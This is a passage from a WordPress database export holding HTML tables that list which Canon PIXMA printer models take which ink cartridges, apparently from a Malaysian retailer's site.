width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:18:47','2019-09-24 08:18:47','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3307,1,'2019-09-24 16:20:34','2019-09-24 08:20:34','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" 